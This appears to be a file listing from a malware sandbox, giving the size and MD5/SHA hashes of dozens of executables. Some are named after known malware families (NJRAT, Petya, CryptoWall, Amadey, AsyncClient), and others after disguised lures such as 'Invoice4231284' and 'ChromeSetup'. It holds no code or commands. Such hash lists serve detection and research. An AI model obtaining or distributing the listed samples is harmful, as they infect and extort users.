C:\Users\Admin\Desktop\Files\ActivationHelper.exe

Filesize
801KB

MD5
9b0220abe9f875c52a33115265ba1f66

SHA1
9d3f8eb6af4afd13ab1ff60d88dd91fbf122fca8

SHA256
43d38e8dcf434e5a8b363089564b6d282a8d22265cc68c6519017a98f323465c

SHA512
350a90fc1ab82436acde8c6c21e2c185d169d70278682d36cd1cc3ad0743e0d86a6d14f3dcf0cf885756584625548203d0dc38458a921bb57424f6c49f9afcd6

Download Submit
C:\Users\Admin\Desktop\Files\AdaptorOvernight.exe

Filesize
7.1MB

MD5
f8164ce38ef216832d1392387942f455

SHA1
7b2d02da80f15bc693c3b2ca7b0991a8ef7a0b9e

SHA256
739a5c44cbab8f0b1bc0205d6dbe62020a36fda3a4fbec5316eb7db4e4fc21a4

SHA512
205c721c52f1c179cd5a0c71b381436ffedeeb220442bf77367f512c2927a14f9f8ca0838b4f4a831257cd837f0dbf653a46b1d4fc62b8ca8c26ae6f52d6c078

Download Submit
C:\Users\Admin\Desktop\Files\Amadey.2.exe

Filesize
424KB

MD5
e4d1c9e8c2b3b6cec83db5605d513c33

SHA1
96614d0cfc30915a683e5c9629991f55a095423d

SHA256
412983ea2172366e21193e3210ed3383dc5493014cec5b8f75bd3413e3b67920

SHA512
d6cf36d1659156b43f7250a034838565fe332220d32b91b75af94783b751f6e707792c4fe284b032b3a6d07e3d1af267329809f924fdcda96949f2b78973d423

Download Submit
C:\Users\Admin\Desktop\Files\Amogus.exe

Filesize
3.2MB

MD5
23c072bdc1c5fe6c2290df7cd3e9abf8

SHA1
e10c6f7843e89f787866aac99c0cb7a3b2c7a902

SHA256
8c7fd294ec6500a01038f916ecab9ec6a92c9f71f02400a47dc73b34fee7f490

SHA512
5e18db624ec40d90776a80d90fa80a8a39f7fcd56a523e2d831942934b00e501e7009cc37b17fa4b29a2c2e5c1895c65fdc3259421fb3ce6ea9da50048c50e0e

Download Submit
C:\Users\Admin\Desktop\Files\ApertureLab.exe

Filesize
2.1MB

MD5
77970896073bbafdc8c1811414c62536

SHA1
c2d2fdbc9e80daa95e3046e2d3bd13e7ca312e18

SHA256
980fcb6365092cd752934417abb0f2a95bca452c58856240157107e70c1d754d

SHA512
5fc31572ad864ca15cd2eb7e8baadc62b72a72ad5d28da4ae04158f67b6cbfd1985983586fd6e51a4781bdffbdd557b30d44d38a3a37ae88cf785c834d739a30

Download Submit
C:\Users\Admin\Desktop\Files\AsyncClient.exe

Filesize
45KB

MD5
7ace559d317742937e8254dc6da92a7e

SHA1
e4986e5b11b96bedc62af5cfb3b48bed58d8d1c9

SHA256
b6c58155365a5e35952e46611fd7b43e36e256903bff2030bc07a3c6841b836f

SHA512
2c50337078075dc6bfd8b02d77d4de8e5b9ad5b01deed1a3b4f3eb0b2d21efce2736e74d5cf94fdf937bcc2a51c2ecf98022049c706350feacb079c4b968d5d3

Download Submit
C:\Users\Admin\Desktop\Files\BYPASSLDPLAYER.exe

Filesize
4.5MB

MD5
8ba898e10f3e10be537bf54acf9cbf1a

SHA1
0194da69f663326bf37082710a993e047c478cbd

SHA256
17630b58b3d63210c8a78672a435ced0a56941dbe1ab00df9f572a7d3a327e39

SHA512
b67c7d2caf620204b63449306ca63845f7058c0951ffa3cae28fce9efb0baf50484203fe25e9da257784328fbf10349ea47c7d155b7e8a2e0781144c4c037c4e

Download Submit
C:\Users\Admin\Desktop\Files\Bloxflip%20Predictor.exe

Filesize
27KB

MD5
7bf897ca59b77ad3069c07149c35f97e

SHA1
6951dc20fa1e550ec9d066fe20e5100a9946a56b

SHA256
bc37b896fee26a5b4de7845cdd046e0200c783d4907ffa7e16da84ed6b5987dd

SHA512
6e0725043262eec328130883b8c6a413c03fa11e766db44e6e2595dfa5d3e13d02b7a199105cad8439c66238cf2975099d40b33cdaeb4768da159060b6f35daf

Download Submit
C:\Users\Admin\Desktop\Files\Blue-Cloner-Signed.exe

Filesize
18.5MB

MD5
45c6ea5de0d4568f38c425b8b084ff38

SHA1
4ea9ea31e99a284940191b46964ee6e1fdfc5569

SHA256
992cfe9e799108c442281c19748ee8bcb77a3fe8dfb808ae0cbf81d9f590731c

SHA512
339a648c5078ce5a5bed658bd95a68a3fd4b138dd48d269445d9ca71b6e31e4ac9c2f08463017db983cc7ed21eaab25ab468cce913ec398efc0a3b5e248c8d28

Download Submit
C:\Users\Admin\Desktop\Files\Built.exe

Filesize
8.9MB

MD5
4041138d8a27d854bf19fd98b791e7f0

SHA1
b3b8a3c7b24b663bd5e880edc6d8764112690d1b

SHA256
203ec9d11a9a9bc611c612c975b34eb35fa811b79571a7f0c92f768d76aec447

SHA512
97826ebce4936339a2f9f19645ee5a1e5372cef44354fd873481f85d1dcaf5a736f0ebb99bed1c370b411be610d1537d7dda606840fca5609a60b7f373ce9b9b

Download Submit
C:\Users\Admin\Desktop\Files\CPDB.exe

Filesize
65KB

MD5
daf531be28ca056a8e9a40966ab83cf0

SHA1
d4ecef593025346e8618aeade8da8678784febdb

SHA256
8b96d4f6ddfcb00b4921f876fea0420b9bab29c3d572da3e95335e978c2f94e5

SHA512
57fb7d295959415d7045a34f7309323399707e4a27bcbf32ac71dd10e6d901b305d040416d55c76881dfab3523024e06f3871cb8a035ce1eac1c66060b8857a7

Download Submit
C:\Users\Admin\Desktop\Files\CalcVaults.exe

Filesize
16KB

MD5
130c3af60db25755ec1c7f19f924885d

SHA1
1b06d7de92c889890b5b89d71abe4c6753aaff62

SHA256
310e04c1e6912e53608e450a2a0bb1cb6ecba5ae7338b2d41531dadc8688e49a

SHA512
881a3cbaf03631838b155d78cf50f627ef01aaf7776a3ec99199bc0585a2a6160fac4d1a4467f7fbfec95a8d256f91571e40e6dcee3e2ee1c59539bdb7011ff8

Download Submit
C:\Users\Admin\Desktop\Files\ChromeSetup.exe

Filesize
1.3MB

MD5
bdb4ee3cf82788678666604f0941d1c3

SHA1
62f1dd4c66015ffa1bf91f278713ed9ee3cf5d2e

SHA256
88a94358abb1292e3f9abc1b39cd93a5509e173de3cd727dd68867bce608c144

SHA512
442008188f7852568681b1655590e9dfb76a54c49543ebf01dc8724fa20ab8019050ef1284d645270abaa2ed1f30786dfdd41a889828209a94562ed892fac626

Download Submit
C:\Users\Admin\Desktop\Files\ChromeUpdate.exe

Filesize
238KB

MD5
bac16142016d690c8769d21668736653

SHA1
4b7c1ca4e7b8739c739980c0b830010a87ceff13

SHA256
7cd9183c01c3c913ea5ea3f0a9cfb0f9594bfae61e6582204786bc4d406614aa

SHA512
50659e8e0e05180ad0acb27b46cfbe7ccdbce8ba97f240b3e6c7e1084e8afaa0624fd1eff82b830c3eb25db45596f6a437bd0cd9ef9d2a3f83fb80f4d015437f

Download Submit
C:\Users\Admin\Desktop\Files\CleanerV2.exe

Filesize
3.1MB

MD5
e6aeb08ae65e312d03f1092df3ba422c

SHA1
f0a4cbe24646ad6bd75869ecc8991fd3a7b55e62

SHA256
74fc53844845b75a441d394b74932caa7c7ad583e091ec0521c78ebad718100e

SHA512
5cce681c2bfea2924516abab84028ebbd78194a4a9a83f9cfdcebdf88aba9e799b1e9ca859a0c68a2438c1c6b605120fc5f192db205173b36237512623514284

Download Submit
C:\Users\Admin\Desktop\Files\Client-built-Playit.exe

Filesize
2.6MB

MD5
ea4f59cb70eeb8c676e25006659970f5

SHA1
f02181674825e6a3c44ec4e060ee33b4f36e66d6

SHA256
222ce5a2352c5c4177e58ae48ada3e00cbbc1d9660a2df19ad0d1b7afa761979

SHA512
aecfdeb3b1eb3861c1a0ae3bef425d41a03979d09fdb8442e69115fbc4d23c6404c4f367e4f98163117ea8cab28b3ee99f4c16abc1bec868d1003697cacca937

Download Submit
C:\Users\Admin\Desktop\Files\Client-built-woprkingfr.exe

Filesize
3.1MB

MD5
9be9030ede5d9db3478edbec8327cce0

SHA1
da10d40404d76d3f6eae3070471a28eaaf95d427

SHA256
bdaa5abcaacc270400718342607903a944d8d13d551388cc1b16a1489043489f

SHA512
4fc90b463140e2f6ebf74c6ece1208e11c03b272f4109e0585149781fccf13197054c0d59070711c11404a229b8d1b252b1f5bff7d93370ddc0cebad87600aac

Download Submit
C:\Users\Admin\Desktop\Files\Client-built.exe

Filesize
3.1MB

MD5
cf049d1ba0fceeb5348f71e15889fbc4

SHA1
94cc88586240456f777aed403d955027555db8d1

SHA256
41bd24fe8b67e9e3cd5bb272a07640de345c39f6cb6c4057491838de95dac6d7

SHA512
2e7a7d3415164cb453193fdceef02d46c35f9103521b33bc424c9b79659fac2e4b9deb0fe8754f0842546b51403181032b6c7a05116adfc4f2b8fd599c3ad6ed

Download Submit
C:\Users\Admin\Desktop\Files\Client-built10.exe

Filesize
3.1MB

MD5
8b09b710cf79da2dbb54ac8548eee0ad

SHA1
b75efaae2675e05f51337bb1380c38b692074656

SHA256
f47017465588d49383d9bb5071956e251d4c2ab024270f97b6ba35a3e6e7dec8

SHA512
92e08ed6248f7e25e630dcfdfadeac8ada8a402def03da2c74c1d69455a8f0262648cb3b14195ea8b7cb7e1de8e510f9fdff897017db9babb675eebd6e07feb5

Download Submit
C:\Users\Admin\Desktop\Files\Client-built4.exe

Filesize
3.1MB

MD5
852ffec071533761c17825b5b09e963d

SHA1
3fdfdb40f36a73cdf048e89d6bf37769ef6d579d

SHA256
3e513a87ea88a2e09660a3b04a23edd7cd407d3c0d9a29bb6990a28a21e45081

SHA512
18828943417cda59835fc1564aec81ca81992439eeb4bc1212b1d032f9e9cf0885d63bf8a8945b5cd8a715508294d76be970d94970fff35a28de59196759040d

Download Submit
C:\Users\Admin\Desktop\Files\CondoGenerator.exe

Filesize
3.1MB

MD5
5da0a355dcd44b29fdd27a5eba904d8d

SHA1
1099e489937a644376653ab4b5921da9527f50a9

SHA256
e7fa9494811b479f00405027a8bad59dccaa410ac439bdd046ed2c440d0e101f

SHA512
289ac0076045bcb1e8b35d572ed27eca424f718b9ef26d821a5cc7ee372203125a6c516b296044efc23ad4d4bd771e1d875cf74107b9205c5312a6c49d37b0a6

Download Submit
C:\Users\Admin\Desktop\Files\ConsoleApplication4.exe

Filesize
18KB

MD5
250c248e5e56aa465b0440ade276d482

SHA1
2c0b8befa55fb1393ee9d5b031663c76450ea629

SHA256
97691758613fbbaac193f76053c7aa4cc2889e33f8a2827e736a192eb7c2bd66

SHA512
8ccb638f265659ffaeeb0cf7f270491b5e78726ad5078a249660f7072cbad41d6a4d2f5b81de6f091cb12283adb852efaf868ec00ac81c82a71fc7134aaddf9c

Download Submit
C:\Users\Admin\Desktop\Files\CoronaVirus.exe

Filesize
1.0MB

MD5
055d1462f66a350d9886542d4d79bc2b

SHA1
f1086d2f667d807dbb1aa362a7a809ea119f2565

SHA256
dddf7894b2e6aafa1903384759d68455c3a4a8348a7e2da3bd272555eba9bec0

SHA512
2c5e570226252bdb2104c90d5b75f11493af8ed1be8cb0fd14e3f324311a82138753064731b80ce8e8b120b3fe7009b21a50e9f4583d534080e28ab84b83fee1

Download Submit
C:\Users\Admin\Desktop\Files\CrSpoof.exe

Filesize
344KB

MD5
f0b64659f584d37b9f8ee6ebd16d0935

SHA1
a969380670a9b6cf5e8a64cc755b0aa2eb14336d

SHA256
335a157aaf5f464499c1c9f030de964612b8a1c3a770579d01dc63c2d40509e7

SHA512
09bd36f15a57f2d4c0b0cc3739fe027487adced352d87e42d9d9be6c8bcf42cdae19085c3cca4c5dfa49480d0aac243554d005c19d4aef5c6332138e7a6f9c52

Download Submit
C:\Users\Admin\Desktop\Files\CrazyCoach.exe

Filesize
925KB

MD5
eb6b66aac02c3f8fb795939bc31bb2ac

SHA1
42d4b425ac1dc36485f6a282cf1d0380f15ec2b7

SHA256
09074473b1df5094d9cf70108182e5e8060cac4e0a21dc33adb8f294cc83d329

SHA512
fd11e521402b188108ed8876a108e61b2d8b92173dbe1375c276e04a3bd630e35bdee6499708d4499e76a080a640cd878791c1c2b7e4ceb2d58b05764a2b960f

Download Submit
C:\Users\Admin\Desktop\Files\Creal.exe

Filesize
286KB

MD5
b988c49b9654ec30906a781cac1ebaaf

SHA1
85f7f7274e6a134870f309c2b3d06b71807e7626

SHA256
26bad763d63a12a6fed9f54fd86ab34d6d4b88250e62d67ad8fc2d433c6dcbcf

SHA512
c4454fe6dff339982370a842133db79dba3fb641688d43a47ce4bdfb158a15eff3cad37c34ec4d881ca01e408af43e00f6f36c254f1bc7d93321b9d5f9028ad5

Download Submit
C:\Users\Admin\Desktop\Files\CritScript.exe

Filesize
3.2MB

MD5
c28dc010fc5198442496bc07dd50cd5d

SHA1
0f90a005815c2700a65ea85ae86f13a182cc11e6

SHA256
1b701daded4124260a49040d83dec15c627b8e4a1a04dc378aae7fecfca3abf3

SHA512
7c94bafa48db045a864a778a010a7d1d03204828bd103a86c1267732a51260b0e689a799cc7e95410ceedd1254fb91aa3f19f62efa3e41e40be645862a4e07e2

Download Submit
C:\Users\Admin\Desktop\Files\CryptoWall.exe

Filesize
132KB

MD5
919034c8efb9678f96b47a20fa6199f2

SHA1
747070c74d0400cffeb28fbea17b64297f14cfbd

SHA256
e036d68b8f8b7afc6c8b6252876e1e290f11a26d4ad18ac6f310662845b2c734

SHA512
745a81c50bbfd62234edb9788c83a22e0588c5d25c00881901923a02d7096c71ef5f0cd5b73f92ad974e5174de064b0c5ea8044509039aab14b2aed83735a7c4

Download Submit
C:\Users\Admin\Desktop\Files\Dark_Autre_ncrypt.exe

Filesize
658KB

MD5
c5ff9d96bc7bc00c2e7c3d656598f118

SHA1
5875b392f6ab097134a8f85e973baecd09439f59

SHA256
2fe6a7ae63c878bd84d7b829349b309e7c84194ddbb6a779816f5b84cd8ad45d

SHA512
757c6409eefe2d346f9016f53fd3e4b092d947f08dec9eb4861a6f3ef6b6f187bfda9160fb3e87fc2f6912841a426c206a162c72fdfdbca0c2805cd88525ac92

Download Submit
C:\Users\Admin\Desktop\Files\Device2.exe

Filesize
48KB

MD5
e21a2d8b6ff3cbf029e1b88ba6524c24

SHA1
6733bd4f7ade164e77a00cf3e2b2d6ace316326e

SHA256
4928399916b4be98730ff68ca10207e3a13bf2739bfb4d5193d9e80461b12f57

SHA512
e58eae8dca54b146bc61ff61c83a1761f8013ad3900c2fb02a5cc81b2f12174de5956ce2d4e3e936e8c07bcb8baf7f76587f0fe7e42e498de9acbc85afe54f77

Download Submit
C:\Users\Admin\Desktop\Files\Discord.exe

Filesize
9.5MB

MD5
ed52c3fd2ec92d442d6c2cb943be903a

SHA1
0f607a28cb73a1f4802ec4befc377bcd3c64840c

SHA256
afb65677bb4f2cd74be4b51cdd838bb647c5513a81b4280b1953105f5c063cc8

SHA512
b686d51b7cb2e157e334a234b0167ac6db7f127c2085edefbb044060d504656c2ee0f1c99149c98b4f0c79919d1df24d25e483d17e67a03ea1602f341eb2caa0

Download Submit
C:\Users\Admin\Desktop\Files\Document8.exe

Filesize
5.4MB

MD5
5ed54eb21ea36f61b79fe9567b8873aa

SHA1
2878919d4ba1f65240cb971a851a244ab8759c6e

SHA256
0ebf34e4c90e371dc2111da1207cf4ae8f90c6f743dae272eb1c889d811cf85f

SHA512
55edf984f1672771a617a9fd2ef8777066997328528bb3c73a181cd05d9c07c636c2fb6df27772c6a4bdcbd8630d8e03eabee5095937bf5c940526adc29ee559

Download Submit
C:\Users\Admin\Desktop\Files\ENP.exe

Filesize
440KB

MD5
a867557587bfa32ff08dc141b71e205b

SHA1
437c034545cf9236fa5a587380811fb2cfdff091

SHA256
74f2fda68a5826b4fefd19984ef59aa76aee954cf703b4a28713d23afabfc2dd

SHA512
fde30fb52bea2bbc6686e2c3a80729dfb8af81cc3752150990941e74920ec8f3fd0609456e28c32af038d858bb0d233d0f8d6775d92694925c5f4e6719467b90

Download Submit
C:\Users\Admin\Desktop\Files\EY3.exe

Filesize
44KB

MD5
bafca3edadb1e08256da81bee006f96f

SHA1
4ed3e9f8736ecc5d7e35e8c391c0413492878c4d

SHA256
dd6274410b5e37f726a171223f6977964d2916884b120f1116ba7e6cb657903d

SHA512
0220fc9b853b586e4ae72027d65d865a9bdc8fb08c732dbdbec8d2efd0d5b0e15dd64e555d672c36947bd2bf5a0d858419aa1f94caeb83da4f857d652faec805

Download Submit
C:\Users\Admin\Desktop\Files\FOi.exe

Filesize
5KB

MD5
cb379a1b986ccd23d9bb71e06d712e12

SHA1
bc89b46e384738ff80fda88cee159d93d8629e56

SHA256
67a7fff4797bfb0e7260b3caeb635473d8a3c9948b40ba7f0da58946ac72d74a

SHA512
3c1c7aea6c290daf9c1fca5551be865d1df5a9fac2d51ffaae506a82decdcb33a3c044376a8a54b310f2435168e0e916151a3ca4af6dd42686307a7090a27287

Download Submit
C:\Users\Admin\Desktop\Files\Fast%20Download.exe

Filesize
27KB

MD5
97d80681daef809909ac1b1e3b9898ba

SHA1
f0ecc4ef701ea6ff61290f6fd4407049cd904e60

SHA256
345d5d2759abd08a84c4c2e2a337a1babd02b5eda3921db1b83eb5d5f5ccc011

SHA512
f90bb8868612f5bc52c07cf90c4e62daf47ba3a3418fae3a82030bff449d62cd83ce185b22fdae632abdb661c8e3a725cc5fa5c44e47ca34f9ccbda6fafd21da

Download Submit
C:\Users\Admin\Desktop\Files\Final.exe

Filesize
3.1MB

MD5
20eeb65678c6fcffcc30cc2fc429f572

SHA1
182305533e4a842da880cf204604456e838878db

SHA256
4266be83abea2867cfa44836d014983f658f688a1f96fe74bed4b2b5f0d59c1b

SHA512
f32cc7a2b5fde293bc9bb6e99c75b92d5725297f128a945f6edcb9ab4d6579ca388370bca5ddff1b5532d6b5e248641bf232a71af93aa031cb86097ed745a872

Download Submit
C:\Users\Admin\Desktop\Files\G1.exe

Filesize
67KB

MD5
400153310cf3f835a944ec4e29a06f54

SHA1
afbaa4a7d5ba2b334a13731500cbfb4554d95af6

SHA256
6a8ebbc9b11afd976b09afa6d6abfaba7bdb3f0e40477a60ee14bbb92d443ede

SHA512
f7b37600f6c23fa7cca4f2c7243e1b55e025f65354cf964cd234f38399b6666ebe63ca030ddbb3c0ed666e0883fe2d816def11d9131ec1b5231de1bc56a2c668

Download Submit
C:\Users\Admin\Desktop\Files\GoodFrag.exe

Filesize
31KB

MD5
14caad7ca134fecc2f7a410c00d04bab

SHA1
c9561c1ce6d69d66c211e74de945bee7e72b2fd7

SHA256
6dd71673be0e890114a8c455c51976f8b67fcf2991b3207bb88bb317abba43e9

SHA512
2f08c1d119cc955e282525311bc7125429be0c27ea799d44acadb3f31cb238012e2930826b6ec5805d365c965032839f87419038d98ad58517d53189317dfa92

Download Submit
C:\Users\Admin\Desktop\Files\Guide2018.exe

Filesize
11.8MB

MD5
35d0a7832aad0c50eaccdba337def8cc

SHA1
8bd73783e808ddfd50e29aff1b8395ea39853552

SHA256
f2f007107f2d2fffe5328114661c79535b991e6f25fe8cc8e1157dd0b6a2723b

SHA512
f77055a833ba6171088ee551439a7686208f46ccb7377be3f4ed3d8c03304ca61b867e82db4241ea11763f5dfbdda0b9a589de65d1629b1ea6c100b515f29ff0

Download Submit
C:\Users\Admin\Desktop\Files\HL-340.exe

Filesize
121KB

MD5
e06f9eb343cfa86a6aef20e62466d444

SHA1
9c661105d63d95a68eeb0dcd97acc827cb0c1fc2

SHA256
432bbfd3f8c6bb30c9766bd6645cb1e9429d7d7c77077342a5368836d07d9a73

SHA512
1f019905b061be36be9a7d78e193f8a5394fb0b7a5eb1acea13e66685c44a1dacd36464e33adea79586d79a8d51936af5f543f3c604bb387afa55f78df3d49fe

Download Submit
C:\Users\Admin\Desktop\Files\IATInfect2008_64.exe

Filesize
128KB

MD5
9d0543fe47a390f1e4c7c81bb3326637

SHA1
197c81881acd0ffc7d9219e4a9df1688714ea70e

SHA256
58be2f77908a38e2ab7120837ba4985d3ba6b3dbe43e872ae039c69cdbc947dd

SHA512
e92518aed9f662f3786e091a611ca13ab837b5eb14bada98910328b0d1b9de163f53c1afa7e57a7e9f9b3e44af46e8afaa1f4e804b20f37e6329d329c521570b

Download Submit
C:\Users\Admin\Desktop\Files\IMG001.exe

Filesize
3.4MB

MD5
d59e32eefe00e9bf9e0f5dafe68903fb

SHA1
99dc19e93978f7f2838c26f01bdb63ed2f16862b

SHA256
e06aa8ce984b22dd80a60c1f818b781b05d1c07facc91fec8637b312a728c145

SHA512
56a3790205885d12252109fdf040e5527fad8a11811e7471e7d406781c9bb4e3514b074daf933a3865de03f99cd13d93203d5478a69e87692cdd016741b73587

Download Submit
C:\Users\Admin\Desktop\Files\InfinityCrypt.exe

Filesize
211KB

MD5
b805db8f6a84475ef76b795b0d1ed6ae

SHA1
7711cb4873e58b7adcf2a2b047b090e78d10c75b

SHA256
f5d002bfe80b48386a6c99c41528931b7f5df736cd34094463c3f85dde0180bf

SHA512
62a2c329b43d186c4c602c5f63efc8d2657aa956f21184334263e4f6d0204d7c31f86bda6e85e65e3b99b891c1630d805b70997731c174f6081ecc367ccf9416

Download Submit
C:\Users\Admin\Desktop\Files\Invoice4231284.exe

Filesize
5.4MB

MD5
f223c16f11e3c4350f34d51d44498877

SHA1
1dc62cdb40dabc991ad3ba4dea1a342e99fdb5a5

SHA256
670be5276e9cfb8ac71c870902de0e55ca467c8fb3b7b7d993a91112557f9376

SHA512
45c3fe528fc31f99ef200153058695ae2b8bf2ef5a4e7f040b984ae36e1acb8a070301d64061c9da49f753be601542e8ad41793220b5026755639ecacb2c8fe4

Download Submit
C:\Users\Admin\Desktop\Files\JJSPLOIT.V2.exe

Filesize
3.1MB

MD5
d4a776ea55e24d3124a6e0759fb0ac44

SHA1
f5932d234baccc992ca910ff12044e8965229852

SHA256
7ef4d0236c81894178a6cfc6c27920217bea42a3602ad7a6002834718ba7b93c

SHA512
ba9127f7f84e55a37e4eb1dc1a50d10ef044f0b24a23d451187c8d1dedec26d3a37cf78e8763b351ef1e492e26b1ef9b28fc2331591ce1b53c3d76369d100f4b

Download Submit
C:\Users\Admin\Desktop\Files\Java32.exe

Filesize
1.1MB

MD5
5c5338a568c6664532d996b8ea74764e

SHA1
5e3e36e2d2f2d8f600a99ae5dfd67af4370fab8b

SHA256
4344f51a12c5eaaf8fd7ae67ab90fe3fc479bb834d001f268d733b78a19b9206

SHA512
773176819354f4133b683cb105d89c786778c8261a9c1e200874f28955d13e957249ef45790407f7e389ea1c7aba38be55baef3d07030cab2ab44ed45e7741ba

Download Submit
C:\Users\Admin\Desktop\Files\Krishna33.exe

Filesize
97KB

MD5
1ebef0766160be26918574b1645c1848

SHA1
c30739eeecb96079bcf6d4f40c94e35abb230e34

SHA256
3e664b59ba376749eb9b596b6499bf7edcec5d34382ead80964f9fe92a4c3c83

SHA512
01c42bb22a92543a3408c6f420593443357a53915937341b5eaf8563ee775dbdeba7af38e2df9c9cf249a512a5a42c65c4c4d39d100e8a4143e58fd235b85951

Download Submit
C:\Users\Admin\Desktop\Files\KuwaitSetupHockey.exe

Filesize
2.3MB

MD5
84e04b0b486c15533c05e4e34bd737dd

SHA1
e7accb60479e6a6cfcc2a89a32dc25c0b67b2e8c

SHA256
ea44d6937e66a8f1f6a80d3b042a039163edb471a56ce9525d1c385216987feb

SHA512
a20f8130977679d7a2a5ba0aece148e8d6b5c311540baf1933234ef0257056a2b85bba66931adbc4876c0b044eaf42377dea345acc01236833818f20c46d5c51

Download Submit
C:\Users\Admin\Desktop\Files\LAc2heq.exe

Filesize
1.3MB

MD5
992d59b995988f975f177b9fdd9f6e7f

SHA1
cb2b76ff2d584d0dd4e7b48041765b19b762c56e

SHA256
749197db4a32523bed2d958af38e95fec63e3401aafa80643119c374b080a573

SHA512
a1ba8ef3882f1893d0cc434247105e5e3d700304f00f3c06de56920ac9480e40f9f81fd9d6d9dc99b3572b52540e2818ffff5c5515c637177afdc160d35a08df

Download Submit
C:\Users\Admin\Desktop\Files\Lab01-02.exe

Filesize
3KB

MD5
8363436878404da0ae3e46991e355b83

SHA1
5a016facbcb77e2009a01ea5c67b39af209c3fcb

SHA256
c876a332d7dd8da331cb8eee7ab7bf32752834d4b2b54eaa362674a2a48f64a6

SHA512
0e2ceca7588462380d4c523dd59ffae8419f9ef0b5f9df4c319b0d6f076d3b5b31ec97ae979614b1557c846b2df4db5e07abd8885a95079cd68b24a02cda4979

Download Submit
C:\Users\Admin\Desktop\Files\LauncherLoader.exe

Filesize
1.6MB

MD5
752fd0d8cb9af0ab6f6de3a66e7572c0

SHA1
7a564fdacd3726dcc99134c963e2f848adf3743d

SHA256
03069726cb4c344a6044613ab5674490360a6f5532824a38d28f55790d51d8ec

SHA512
efe35c8d80ea981672095bb7a079a45bd90c607f086858e5477d4ddd45837e4644d544fcf3f8fcb5275d58b3cb3937194736bdf7ef39014a099d25502ed50d4b

Download Submit
C:\Users\Admin\Desktop\Files\LicenseMalwareBytes.exe

Filesize
7.9MB

MD5
487901443f9e51ad732b1cd856b03c69

SHA1
4b3d2e271666fe17ef7e9db34743babf814abae8

SHA256
2de955cb5926261634ce51565e5cc9fd52ebccd9c3b7f8b5dd1db369cb1f9731

SHA512
72d81ee6a62059eaa0a3ab9f4d0a5e489d039ef263cb8af66840a386d52e8a6c11b3377f247bb50cae3915155cad7699e568642d27174913a4f05ca8df7c5928

Download Submit
C:\Users\Admin\Desktop\Files\MS14-068.exe

Filesize
3.3MB

MD5
6450254d888950d0137da706c58b2fe4

SHA1
677f7c6e9fa320ac3175619b69acc61da6e07539

SHA256
6782c5111abd17435851432895b55cc6371d323a06d710801551cea800bf65d0

SHA512
c4c515149e00a8aad95a4715ba48166be2e6f402b711000ea9257e364f956ebb43a5297314f74bfde49fe72b3e06e7d8659161f012b5cb428a8210117545b0fb

Download Submit
C:\Users\Admin\Desktop\Files\Minecraft.exe

Filesize
6.9MB

MD5
5558901b8796706f9e14dc8977d1154a

SHA1
38a2d355e7039b184698e43fafed51dcb6b61f4d

SHA256
22d8995c61db5e5f4300cfa7d648ee78dc857af0d9759ed2680fc5c1c78cc9a9

SHA512
735a28b27f4c0dfe26b55b3569d12b45e4dcb3b54e6df7cc768985c7a71b72e0a80f1f11408a2b677f5c2199f6c9bbc6c95cc6f8ca52bac4e3238e5e3e925c3e

Download Submit
C:\Users\Admin\Desktop\Files\Mova.exe

Filesize
128KB

MD5
135bb08a6f9f95bc8d43012c2e93235a

SHA1
694b7290466f7f0c2396c19c3a09816efaf7ef92

SHA256
50420e81fcb8e8df20e25025e7066ebcbade1c2d0c8dd846a0f1d5c0c9a72cbd

SHA512
0211f7097936ccca9c1ef1da9fc8630dccee7488baa5dd608376773c6fb5a8c69af971d77de3ef3769918ddda0074eef42017a22464bca1213054f45de43f8df

Download Submit
C:\Users\Admin\Desktop\Files\NJRAT%20DANGEROUS.exe

Filesize
69KB

MD5
401b1ea00d135d5060f237c2f5a8a6c4

SHA1
6955a95c3b4f5de689b352e3d7e0badd821d624b

SHA256
9b8cbcf33039dc4ee3a8649fab25ed587e7c75958473f4eb814d5c13d90f8ffa

SHA512
36324a55944a423adbde5856dbfd80498edbbdafea4808f4f39da7ab5a9c50059c4d242b2365062856187160ee65edb573e81d4644a1e7fbde20b4656ee892b4

Download Submit
C:\Users\Admin\Desktop\Files\NOTallowedtocrypt.exe

Filesize
475KB

MD5
2b8f487213f3da1f42779e22d7b02d1a

SHA1
77c96429d6facbd1900290c9cbfed378103b8e01

SHA256
a4da37e92ca54c8851ad144fba875b61e2018f69bbe43b11926d8f8d831b56f0

SHA512
2db88a30fdfc1e859edb7229b2073449b5d57640e484e21d78047fd674fc194c2c790995621b4d0ed7927ec06e8325c7333a1893227e50d38b2559fc267cc6bf

Download Submit
C:\Users\Admin\Desktop\Files\Nan_Brout_ncrypt.exe

Filesize
209KB

MD5
51369fea111eee2682a99f9d3d6476fc

SHA1
abb83200ed459c1457858b1a06cff33dd401098d

SHA256
710ff75d5a2cbf5c03f0d614b6be6f7a74c32be8108427648445ea1acd8a3cdf

SHA512
46ec661e1c760d633bd46c1655e87e8fce77376ac3652f245ca3a5487db124818efed6cc533e53f778d55654878a56290b7bff7e843acf4487d685a16eccfe23

Download Submit
C:\Users\Admin\Desktop\Files\Pack_Autre_ncrypt.exe

Filesize
121KB

MD5
fd184f32ca8cf3f8b02befdb9a567b07

SHA1
7562c1f0e0fe24a8636c54bfff2e5c667734929a

SHA256
06d4d9c90a5c57eda0c395db13d3743a669b77d36ff78ce5f1bdaac4016a4dec

SHA512
98ee1ebe13ff2f967eb0c00a14c75f6bcd39f600457da79a058d800b6b4b6fd04c110ef72434d5ade200fdf5173904505e6e34567a0a82ad00b7d0495889bc94

Download Submit
C:\Users\Admin\Desktop\Files\Pdf%20Reader.exe

Filesize
73KB

MD5
9d347d5ac998a89f78ba00e74b951f55

SHA1
73df3d5c8388a4d6693cbb24f719dba8833c9157

SHA256
2ea5686422bd8fb6eda542e9a96588f9deb1c97c45f3cb7d3b21ac4da540b57c

SHA512
3db7421aa98e8e108bf982048dda7e0f09428c6498cf5f9f56ef499fb2fafc5deabde8ecb99e1fdd570d54ae9c0533b7502de5848c9e772708cf75509d0c9d9e

Download Submit
C:\Users\Admin\Desktop\Files\Petya.A.exe

Filesize
225KB

MD5
af2379cc4d607a45ac44d62135fb7015

SHA1
39b6d40906c7f7f080e6befa93324dddadcbd9fa

SHA256
26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739

SHA512
69899c47d0b15f92980f79517384e83373242e045ca696c6e8f930ff6454219bf609e0d84c2f91d25dfd5ef3c28c9e099c4a3a918206e957be806a1c2e0d3e99

Download Submit
C:\Users\Admin\Desktop\Files\RDPW_Installer.exe

Filesize
2.4MB

MD5
6ebea4d46302623d47827cd82e0aa4b3

SHA1
51c8d2af8a8f00da1eab9ce34a9f9505115295de

SHA256
932bcf6c68e34fb99ffafb5ae62a1473fe761d961034cb5630dc3a9ba9155ccb

SHA512
